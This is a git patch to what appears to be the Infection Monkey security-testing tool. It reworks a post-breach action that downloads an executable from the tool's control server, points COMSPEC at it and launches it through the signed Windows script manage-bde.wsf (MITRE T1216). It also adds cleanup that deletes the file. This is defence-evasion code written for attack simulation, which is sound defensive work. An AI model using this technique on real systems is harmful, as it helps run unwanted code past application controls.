From ba8a7797e6d9491301a1edb5b13400354fe9b43f Mon Sep 17 00:00:00 2001 From: Shreya Date: Thu, 20 Aug 2020 01:24:47 +0530 Subject: [PATCH] Download exe from the island successfully, delete during pba cleanup --- .../signed_script_proxy.py | 2 ++ .../windows/signed_script_proxy.py | 24 ++++++++++--------- .../cc/resources/T1216_pba_file_download.py | 11 +++++---- 3 files changed, 22 insertions(+), 15 deletions(-) diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py index e3199fc12..4eb55117b 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py @@ -1,6 +1,7 @@ import subprocess from infection_monkey.post_breach.signed_script_proxy.windows.signed_script_proxy import ( + get_windows_commands_to_delete_temp_comspec, get_windows_commands_to_proxy_execution_using_signed_script, get_windows_commands_to_reset_comspec) from infection_monkey.utils.environment import is_windows_os @@ -14,3 +15,4 @@ def get_commands_to_proxy_execution_using_signed_script(): def cleanup_changes(original_comspec): if is_windows_os(): subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116 + subprocess.run(get_windows_commands_to_delete_temp_comspec, shell=True) # noqa: DUO116 diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py index aad179640..1e06f453e 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py @@ -1,27 +1,29 @@ -import shutil +import os import subprocess -from pathlib import Path from infection_monkey.control import ControlClient +TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe') + def get_windows_commands_to_proxy_execution_using_signed_script(): - # temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe'] - # temp_comspec = Path(*temp_comspec_path) - temp_comspec = "c:\\Users\\win\\desktop\\t1216.exe" - with ControlClient.get_T1216_pba_file() as r: - with open(temp_comspec, 'wb') as f: - shutil.copyfileobj(r.raw, f) + download = ControlClient.get_T1216_pba_file() + with open(TEMP_COMSPEC, 'wb') as file_obj: + file_obj.write(download.content) + file_obj.flush() windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116 - signed_script_path = [windir_path, 'System32', 'manage-bde.wsf'] - signed_script = Path(*signed_script_path) + signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf') return [ - f'set comspec={temp_comspec} &&', + f'set comspec={TEMP_COMSPEC} &&', f'cscript {signed_script}' ] def get_windows_commands_to_reset_comspec(original_comspec): return f'set comspec={original_comspec}' + + +def get_windows_commands_to_delete_temp_comspec(): + return f'del {TEMP_COMSPEC} /f' diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py index 16aa43581..104c113f4 100644 --- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py +++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py @@ -1,14 +1,17 @@ -from pathlib import Path +import os import flask_restful from flask import send_from_directory +from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH + class T1216PBAFileDownload(flask_restful.Resource): """ File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA) """ + def get(self): - executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe'] - executable_file = Path(*executable_file_path) - return send_from_directory(executable_file) + executable_file_name = 'T1216_random_executable.exe' + return send_from_directory(directory=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'), + filename=executable_file_name)